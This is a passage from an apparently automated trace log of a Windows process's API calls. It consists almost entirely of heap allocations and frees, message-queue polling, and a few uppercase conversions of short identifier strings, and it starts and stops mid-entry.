wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.674] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.674] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0208.674] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.674] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0208.675] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0208.675] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0208.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.676] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.676] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.676] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.677] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75380 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.679] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.680] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.680] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.680] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.680] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.680] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.681] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0208.681] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.681] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.681] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 